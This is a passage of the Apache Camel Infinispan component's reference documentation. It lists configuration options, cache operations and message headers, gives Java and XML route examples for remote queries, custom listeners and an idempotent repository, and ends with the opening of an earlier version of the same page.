By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. | PUT | InfinispanOperation\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheContainer* (advanced) | Specifies the cache Container to connect | | BasicCacheContainer\n| *cacheContainerConfiguration* (advanced) | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *configurationProperties* (advanced) | Implementation specific properties for the CacheManager | | Map\n| *configurationUri* (advanced) | An implementation specific URI for the CacheManager | | String\n| *flags* (advanced) | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | String\n| *remappingFunction* (advanced) | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *resultHeader* (advanced) | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. 
This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 23 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.infinispan.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.infinispan.cache-container* | The default cache container. The option is a org.infinispan.commons.api.BasicCacheContainer type. | | String\n| *camel.component.infinispan.configuration.cache-container* | Specifies the cache Container to connect | | BasicCacheContainer\n| *camel.component.infinispan.configuration.cache-container-configuration* | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *camel.component.infinispan.configuration.clustered-listener* | If true, the listener will be installed for the entire cluster | false | Boolean\n| *camel.component.infinispan.configuration.configuration-properties* | Implementation specific properties for the CacheManager | | Map\n| *camel.component.infinispan.configuration.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.infinispan.configuration.custom-listener* | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *camel.component.infinispan.configuration.event-types* | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. <p\/> The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | Set\n| *camel.component.infinispan.configuration.flags* | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | Flag[]\n| *camel.component.infinispan.configuration.hosts* | Specifies the host of the cache on Infinispan instance | | String\n| *camel.component.infinispan.configuration.operation* | The operation to perform. | | InfinispanOperation\n| *camel.component.infinispan.configuration.query-builder* | Specifies the query builder. 
| | InfinispanQueryBuilder\n| *camel.component.infinispan.configuration.remapping-function* | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *camel.component.infinispan.configuration.result-header* | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *camel.component.infinispan.configuration.sync* | If true, the consumer will receive notifications synchronously | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.enabled* | Enable infinispan component | true | Boolean\n| *camel.component.infinispan.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n| *camel.component.infinispan.configuration.command* | *Deprecated* The operation to perform. 
| PUT | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n== Camel Operations\nThis section lists all available operations, along with their header information.\n\n.Put Operations\n[cols=\"40%,60%\", frame=\"all\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.PUT\n| *Context*: Embedded \/ Remote\n\n*Description*: Puts a key\/value pair in the cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanKey, CamelInfinispanValue\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit, CamelInfinispanIgnoreReturnValues\n\n*Result Header*: CamelInfinispanOperationResult\n\n| InfinispanOperation.PUTASYNC\n| *Description*: Asynchronously puts a key\/value pair in the cache, optionally with expiration\n\n\n| InfinispanOperation.PUTIFABSENT\n| *Description*: Puts a key\/value pair in the cache if it did not exist, optionally with expiration\n\n\n| InfinispanOperation.PUTIFABSENTASYNC\n| *Description*: Asynchronously puts a key\/value pair in the cache if it did not exist, optionally with expiration\n\n|===\n\n.Put All Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.PUTALL\n| *Context*: Embedded \/ Remote\n\n*Description*: Adds multiple entries to a cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanMap\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit\n\n*Result Header*: None\n\n| CamelInfinispanOperation.PUTALLASYNC\n| *Description*: Asynchronously adds multiple entries to a cache, optionally with expiration\n\n|===\n\n.Get Operations\n[cols=\"40%,60%\", frame=\"all\", options=\"header\"]\n|===\n|Operation Name\n|Description\n\n| InfinispanOperation.GET\n| *Context*: Embedded \/ Remote\n\n*Description*: Retrieves the value associated with a specific key from the cache\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: None\n\n| InfinispanOperation.GETORDEFAULT\n| *Context*: Embedded \/ Remote\n\n*Description*: Retrieves the value, or default value, associated with a specific key from the cache\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: None\n|===\n\n.Contains Key Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CONTAINSKEY\n| *Context*: Embedded \/ Remote\n\n*Description*: Determines whether a cache contains a specific key\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Contains Value Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CONTAINSVALUE\n| *Context*: Embedded \/ Remote\n\n*Description*: Determines whether a cache contains a specific value\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Headers*: None\n|===\n\n.Remove Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.REMOVE\n| *Context*: Embedded \/ Remote\n\n*Description*: Removes an entry from a cache, optionally only if the value matches a given one\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: CamelInfinispanValue\n\n*Result Header*: CamelInfinispanOperationResult\n\n| 
InfinispanOperation.REMOVEASYNC\n| *Description*: Asynchronously removes an entry from a cache, optionally only if the value matches a given one\n\n|===\n\n.Replace Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.REPLACE\n| *Context*: Embedded \/ Remote\n\n*Description*: Conditionally replaces an entry in the cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanKey, CamelInfinispanValue, CamelInfinispanOldValue\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit, CamelInfinispanIgnoreReturnValues\n\n*Result Header*: CamelInfinispanOperationResult\n\n| InfinispanOperation.REPLACEASYNC\n| *Description*: Asynchronously conditionally replaces an entry in the cache, optionally with expiration\n\n|===\n\n.Clear Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CLEAR\n| *Context*: Embedded \/ Remote\n\n*Description*: Clears the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: None\n\n| InfinispanOperation.CLEARASYNC\n| *Context*: Embedded \/ Remote\n\n*Description*: Asynchronously clears the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: None\n|===\n\n.Size Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.SIZE\n| *Context*: Embedded \/ Remote\n\n*Description*: Returns the number of entries in the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Stats Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.STATS\n| *Context*: Embedded \/ Remote\n\n*Description*: Returns statistics about the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Query Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.QUERY\n| *Context*: Remote\n\n*Description*: Executes a query on the cache\n\n*Required Headers*: CamelInfinispanQueryBuilder\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n[NOTE]\n====\nAny operations that take `CamelInfinispanIgnoreReturnValues` will receive a null result.\n====\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"10%,10%,10%,10%,60%\",options=\"header\",]\n|=======================================================================\n|Name |Default Value |Type |Context |Description\n|CamelInfinispanCacheName |`null` |String |Shared |The cache participating in the operation or event.\n|CamelInfinispanOperation |`PUT` |InfinispanOperation |Producer |The operation to perform.\n|CamelInfinispanMap |`null` |Map |Producer |A Map to use in case of CamelInfinispanOperationPutAll operation\n|CamelInfinispanKey |`null` |Object |Shared |The key to perform the operation to or the key generating the event.\n|CamelInfinispanValue |`null` |Object |Producer |The value to use for the operation.\n|CamelInfinispanEventType |`null` |String |Consumer |The type of the received event. 
Possible values are defined in org.infinispan.notifications.cachelistener.event.Event.Type\n|CamelInfinispanIsPre |`null` |Boolean |Consumer |Infinispan fires two events for each operation: one before and one after the operation.\n|CamelInfinispanLifespanTime |`null` |long |Producer |The Lifespan time of a value inside the cache. Negative values are interpreted as infinity.\n|CamelInfinispanTimeUnit |`null` |String |Producer |The Time Unit of an entry Lifespan Time.\n|CamelInfinispanMaxIdleTime |`null` |long |Producer |The maximum amount of time an entry is allowed to be idle for before it is considered as expired.\n|CamelInfinispanMaxIdleTimeUnit |`null` |String |Producer |The Time Unit of an entry Max Idle Time.\n|CamelInfinispanQueryBuilder |null |InfinispanQueryBuilder |Producer |The QueryBuilder to use for the QUERY command; if not present, the command defaults to the one set on the InfinispanConfiguration\n|CamelInfinispanIgnoreReturnValues |null |Boolean |Producer |If this header is set, the return value of a cache operation that returns something is ignored by the client application\n|CamelInfinispanOperationResultHeader |null |String |Producer |Store the operation result in a header instead of the message body\n|=======================================================================\n\n== Examples\n\n* Retrieve a specific key from the default cache using a custom cache container:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer\");\n----\n\n\n* Retrieve a specific key from a named cache:\n+\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan:myCacheName\");\n----\n\n* Put a value with lifespan\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.PUT)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .setHeader(InfinispanConstants.VALUE).constant(\"some value\")\n .setHeader(InfinispanConstants.LIFESPAN_TIME).constant(100L)\n .setHeader(InfinispanConstants.LIFESPAN_TIME_UNIT).constant(TimeUnit.MILLISECONDS.toString())\n .to(\"infinispan:myCacheName\");\n----\n\n* Compute operation through a remapping function on the default cache using a custom cache container:\n\n[source,java]\n----\n@BindToRegistry(\"mappingFunction\")\nBiFunction<String, String, String> comp = (k, v) -> v + \"replay\"; \n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.COMPUTE)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer&remappingFunction=#mappingFunction\");\n----\n\nThis will return oldValue + \"replay\".\n\nThis can also be done as an async operation, with `InfinispanOperation.COMPUTEASYNC`.\n\n* Retrieve a specific key from the remote cache using a cache container configuration with additional parameters (host, port and protocol version):\n\n[source,java]\n----\norg.infinispan.client.hotrod.configuration.Configuration cacheContainerConfiguration = new org.infinispan.client.hotrod.configuration.ConfigurationBuilder()\n .addServer()\n .host(\"localhost\")\n .port(9999)\n .version(org.infinispan.client.hotrod.ProtocolVersion.PROTOCOL_VERSION_25)\n .build();\n...\n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n 
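\/\/ GET looks up the entry for the key set below and stores the value in the message body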
.setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainerConfiguration=#cacheContainerConfiguration\");\n----\n\n\n\n=== XML examples\n\nRouting can also be performed using XML configuration.\nThe following example demonstrates `camel-infinispan` `local-camel-producer`, a camel route that sends data to an embedded cache created by the `local-cache` module.\n\n[source,java,options=\"nowrap\"]\n----\n<camelContext id=\"local-producer\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"timer:\/\/local?fixedRate=true&period=5000\"\/>\n <setHeader headerName=\"CamelInfinispanKey\">\n <constant>CamelTimerCounter<\/constant>\n <\/setHeader>\n <setHeader headerName=\"CamelInfinispanValue\">\n <constant>CamelTimerCounter<\/constant>\n <\/setHeader>\n <to uri=\"infinispan:\/\/foo?cacheContainer=#cacheManager\"\/>\n <to uri=\"log:local-put?showAll=true\"\/>\n <\/route>\n<\/camelContext>\n----\n\n\nThe provided example requires you to instantiate the [class]``cacheManager``.\n\nYou can instantiate the [class]``cacheManager`` bean for Spring XML as follows:\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"cacheManager\" class=\"org.infinispan.manager.DefaultCacheManager\" init-method=\"start\" destroy-method=\"stop\">\n <constructor-arg type=\"java.lang.String\" value=\"infinispan.xml\"\/>\n<\/bean>\n----\n\n\nThe following demonstrates how to instantiate the [class]``cacheManager`` bean using Blueprint XML.\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"cacheManager\" class=\"org.infinispan.manager.DefaultCacheManager\" init-method=\"start\" destroy-method=\"stop\">\n <argument value=\"infinispan.xml\" \/>\n<\/bean>\n----\n\n[NOTE]\n====\nBoth the Spring XML and Blueprint XML examples use the configuration file [path]_infinispan.xml_\n for configuration of the cache. 
This file must be present on the classpath.\n====\n\n\n== Remote Query\n\nWhen executing remote queries, the cacheManager must be an instance of ``RemoteCacheManager``, and example configurations using a `RemoteCacheManager` are shown below for both Java and blueprint.xml: \n\n.Using only Java\n====\n[source,java,options=\"nowrap\"]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION, InfinispanConstants.QUERY)\n .setHeader(InfinispanConstants.QUERY_BUILDER,\n new InfinispanQueryBuilder() {\n public Query build(QueryFactory<Query> queryFactory) {\n return queryFactory.from(User.class).having(\"name\").like(\"%abc%\")\n .build();\n }\n })\n .to(\"infinispan:\/\/localhost?cacheContainer=#cacheManager&cacheName=remote_query_cache\");\n----\n====\n\n.Using Blueprint and Java\n====\n.Java [class]``RemoteCacheManagerFactory`` class: \n[source,java,options=\"nowrap\"]\n----\npublic class RemoteCacheManagerFactory { \n ConfigurationBuilder clientBuilder;\n public RemoteCacheManagerFactory(String hostname, int port) {\n clientBuilder = new ConfigurationBuilder();\n clientBuilder.addServer()\n .host(hostname).port(port);\n }\n public RemoteCacheManager newRemoteCacheManager() {\n return new RemoteCacheManager(clientBuilder.build());\n }\n}\n----\n.Java [class]``InfinispanQueryExample`` class: \n[source,java,options=\"nowrap\"]\n----\npublic class InfinispanQueryExample {\n public InfinispanQueryBuilder getBuilder() {\n return new InfinispanQueryBuilder() {\n public Query build(QueryFactory<Query> queryFactory) {\n return queryFactory.from(User.class)\n .having(\"name\")\n .like(\"%abc%\")\n .build();\n }\n };\n }\n}\n----\n.blueprint.xml: \n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"remoteCacheManagerFactory\" class=\"com.datagrid.RemoteCacheManagerFactory\"> \n <argument value=\"localhost\"\/> \n <argument value=\"11222\"\/> \n<\/bean>\n \n<bean id=\"cacheManager\"\n factory-ref=\"remoteCacheManagerFactory\" \n factory-method=\"newRemoteCacheManager\"> \n<\/bean>\n\n<bean id=\"queryBuilder\" class=\"org.example.com.InfinispanQueryExample\"\/>\n\n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader headerName=\"CamelInfinispanOperation\">\n <constant>CamelInfinispanOperationQuery<\/constant>\n <\/setHeader>\n <setHeader headerName=\"CamelInfinispanQueryBuilder\">\n <method ref=\"queryBuilder\" method=\"getBuilder\"\/>\n <\/setHeader>\n <to uri=\"infinispan:\/\/localhost?cacheContainer=#cacheManager&amp;cacheName=remote_query_cache\"\/>\n <\/route>\n<\/camelContext>\n----\n====\n\nThe `remote_query_cache` is an arbitrary name for a cache that holds the data, and the results of the query will be a list of domain objects stored as a `CamelInfinispanOperationResult` header. \n\nIn addition, there are the following requirements (a minimal sketch of these steps follows the list): \n\n* The [class]``RemoteCacheManager`` must be configured to use [class]``ProtoStreamMarshaller``. \n* The [class]``ProtoStreamMarshaller`` must be registered with the [class]``RemoteCacheManager``'s serialization context. \n* The .proto descriptors for domain objects must be registered with the remote Data Grid server. 
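\nA minimal sketch of those registration steps (the `.proto` resource name and the commented-out marshaller class are assumptions; the `ProtoStreamMarshaller` shown is the HotRod client's own):\n\n[source,java,options=\"nowrap\"]\n----\nimport org.infinispan.client.hotrod.RemoteCacheManager;\nimport org.infinispan.client.hotrod.configuration.ConfigurationBuilder;\nimport org.infinispan.client.hotrod.marshall.ProtoStreamMarshaller;\nimport org.infinispan.protostream.FileDescriptorSource;\nimport org.infinispan.protostream.SerializationContext;\n\npublic class ProtoStreamSetup {\n public static RemoteCacheManager newCacheManager() throws Exception {\n \/\/ 1. Configure the client to marshal with ProtoStream\n RemoteCacheManager cacheManager = new RemoteCacheManager(\n new ConfigurationBuilder()\n .addServer().host(\"localhost\").port(11222)\n .marshaller(new ProtoStreamMarshaller())\n .build());\n \/\/ 2. Register the .proto descriptor and a marshaller for each domain class\n SerializationContext ctx = ProtoStreamMarshaller.getSerializationContext(cacheManager);\n ctx.registerProtoFiles(FileDescriptorSource.fromResources(\"\/user.proto\")); \/\/ assumed resource\n \/\/ ctx.registerMarshaller(new UserMarshaller()); \/\/ your generated or hand-written marshaller\n \/\/ 3. The same .proto file must also be registered on the server side,\n \/\/ e.g. by putting it into the ___protobuf_metadata cache.\n return cacheManager;\n }\n}\n----\n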
\n\n\n== Custom Listeners for Embedded Cache\n\nCustom Listeners for an embedded cache can be registered through the [parameter]``customListener`` parameter as shown below: \n\n.Using Java\n\n[source,java,options=\"nowrap\"]\n----\nfrom(\"infinispan:\/\/?cacheContainer=#myCustomContainer&cacheName=customCacheName&customListener=#myCustomListener\")\n .to(\"mock:result\");\n----\n\n.Using Blueprint\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"myCustomContainer\" class=\"org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\" destroy-method=\"stop\">\n <argument value=\"infinispan.xml\" \/>\n<\/bean>\n\n<bean id=\"myCustomListener\" class=\"org.example.com.CustomListener\"\/>\n \n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"infinispan:\/\/?cacheContainer=#myCustomContainer&amp;cacheName=customCacheName&amp;customListener=#myCustomListener\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n\nThe instance of [class]``myCustomListener`` must exist.\nUsers are encouraged to extend the [class]``org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedCustomListener`` and annotate the resulting class with the `@Listener` annotation from [package]#org.infinispan.notifications#.\n\n[NOTE]\n====\nCustom filters and converters for embedded caches are currently not supported. \n====\n\n\n== Custom Listeners for Remote Cache\n\nCustom listeners for a remote cache can be registered in the same way as an embedded cache, with the exception that [parameter]``sync=false`` must be present.\nFor instance: \n\n.Using only Java\n====\n[source,java,options=\"nowrap\"]\n----\nfrom(\"infinispan:\/\/?cacheContainer=#cacheManager&sync=false&customListener=#myCustomListener\")\n .to(\"mock:result\");\n----\n====\n\n.Using Blueprint and Java\n====\n.Java class: \n[source,java,options=\"nowrap\"]\n----\npublic class RemoteCacheManagerFactory { \n ConfigurationBuilder clientBuilder;\n public RemoteCacheManagerFactory(String hostname, int port) {\n clientBuilder = new ConfigurationBuilder();\n clientBuilder.addServer()\n .host(hostname).port(port);\n }\n public RemoteCacheManager newRemoteCacheManager() {\n return new RemoteCacheManager(clientBuilder.build());\n }\n}\n----\n.blueprint.xml: \n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"remoteCacheManagerFactory\" class=\"com.datagrid.RemoteCacheManagerFactory\"> \n <argument value=\"localhost\"\/> \n <argument value=\"11222\"\/> \n<\/bean>\n \n<bean id=\"cacheManager\"\n factory-ref=\"remoteCacheManagerFactory\" \n factory-method=\"newRemoteCacheManager\"> \n<\/bean>\n\n<bean id=\"myCustomListener\" class=\"org.example.com.CustomListener\"\/>\n\n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"infinispan:\/\/?cacheContainer=#cacheManager&amp;sync=false&amp;customListener=#myCustomListener\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n====\n\nThe instance of [class]``myCustomListener`` must exist.\nUsers are encouraged to extend the [class]``org.apache.camel.component.infinispan.remote.InfinispanRemoteCustomListener`` class and annotate the resulting class with ``@ClientListener``; this annotation is found in [package]#org.infinispan.client.hotrod.annotation#. 
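\nFor illustration, a minimal sketch (the class name and callback bodies are assumptions) showing the plain HotRod listener annotations such a class would carry; in a Camel route the class would additionally extend `InfinispanRemoteCustomListener`, as described above:\n\n[source,java,options=\"nowrap\"]\n----\nimport org.infinispan.client.hotrod.annotation.ClientCacheEntryCreated;\nimport org.infinispan.client.hotrod.annotation.ClientCacheEntryModified;\nimport org.infinispan.client.hotrod.annotation.ClientListener;\nimport org.infinispan.client.hotrod.event.ClientCacheEntryCreatedEvent;\nimport org.infinispan.client.hotrod.event.ClientCacheEntryModifiedEvent;\n\n@ClientListener\npublic class LoggingListener {\n\n @ClientCacheEntryCreated\n public void created(ClientCacheEntryCreatedEvent<String> event) {\n \/\/ Remote events only carry the key, not the value\n System.out.println(\"created: \" + event.getKey());\n }\n\n @ClientCacheEntryModified\n public void modified(ClientCacheEntryModifiedEvent<String> event) {\n System.out.println(\"modified: \" + event.getKey());\n }\n}\n----\n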
\n\nRemote listeners may also be associated with custom filters and converters as shown below: \n[source,java,options=\"nowrap\"]\n----\n@ClientListener(includeCurrentState=true, filterFactoryName = \"static-filter-factory\", converterFactoryName = \"static-converter-factory\")\nprivate static class MyCustomListener extends InfinispanRemoteCustomListener {\n}\n----\n\nIn order to use custom filters or converters, classes annotated with `@NamedFactory` must be implemented.\nA skeleton showing the necessary methods is shown below: \n[source,java,options=\"nowrap\"]\n----\nimport org.infinispan.notifications.cachelistener.filter.*;\n\n@NamedFactory(name = \"static-converter-factory\")\npublic static class StaticConverterFactory implements CacheEventConverterFactory {\n @Override\n public CacheEventConverter<Integer, String, CustomEvent> getConverter(Object[] params) {\n ...\n }\n\n static class StaticConverter implements CacheEventConverter<Integer, String, CustomEvent>, Serializable {\n @Override\n public CustomEvent convert(Integer key, String previousValue, Metadata previousMetadata, \n String value, Metadata metadata, EventType eventType) {\n ...\n }\n }\n}\n \n@NamedFactory(name = \"static-filter-factory\")\npublic static class StaticCacheEventFilterFactory implements CacheEventFilterFactory {\n @Override\n public CacheEventFilter<Integer, String> getFilter(final Object[] params) {\n ...\n }\n\n static class StaticCacheEventFilter implements CacheEventFilter<Integer, String>, Serializable {\n @Override\n public boolean accept(Integer key, String previousValue, Metadata previousMetadata, \n String value, Metadata metadata, EventType eventType) {\n ...\n }\n }\n}\n----\n\nCustom filters and converters must be registered with the server.\n\n[NOTE]\n====\nIn order to listen for remote HotRod events, the cacheManager must be of type [class]``RemoteCacheManager`` and must already be instantiated. 
\n====\n\n\n\n== Using the Infinispan based idempotent repository\n\nIn this section we will use the Infinispan based idempotent repository.\n\nFirst, we need to create a cacheManager and then configure an\n`org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository`:\n\n[source,xml]\n----\n<!-- set up the cache manager -->\n<bean id=\"cacheManager\"\n class=\"org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\"\n destroy-method=\"stop\"\/>\n\n<!-- set up the repository -->\n<bean id=\"infinispanRepo\"\n class=\"org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository\"\n factory-method=\"infinispanIdempotentRepository\">\n <argument ref=\"cacheManager\"\/>\n <argument value=\"idempotent\"\/>\n<\/bean>\n----\n\nThen we can use the repository from an idempotent consumer in the spring\nXML file as well:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"InfinispanMessageIdRepositoryTest\">\n <from uri=\"direct:start\" \/>\n <idempotentConsumer messageIdRepositoryRef=\"infinispanRepo\">\n <header>messageId<\/header>\n <to uri=\"mock:result\" \/>\n <\/idempotentConsumer>\n <\/route>\n<\/camelContext>\n----\n\n== See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","old_contents":"[[infinispan-component]]\n= Infinispan Component\n\n*Available as of Camel version 2.13*\n\nThis component allows you to interact with\nhttp:\/\/infinispan.org\/[Infinispan] distributed data grid \/ cache.\nInfinispan is an extremely scalable, highly available key\/value data\nstore and data grid platform written in Java.\n\nInfinispan requires at least Java 8.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,java]\n-------------------------------\ninfinispan:\/\/cacheName?[options]\n-------------------------------\n\n== URI Options\n\nThe producer allows sending messages to a local infinispan cache\nconfigured in the registry, or to a remote cache using the HotRod\nprotocol. The consumer allows listening for events from local infinispan cache\naccessible from the registry.\n\n\n\/\/ component options: START\nThe Infinispan component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | The default configuration shared among endpoints. | | InfinispanConfiguration\n| *cacheContainer* (common) | The default cache container. | | BasicCacheContainer\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. 
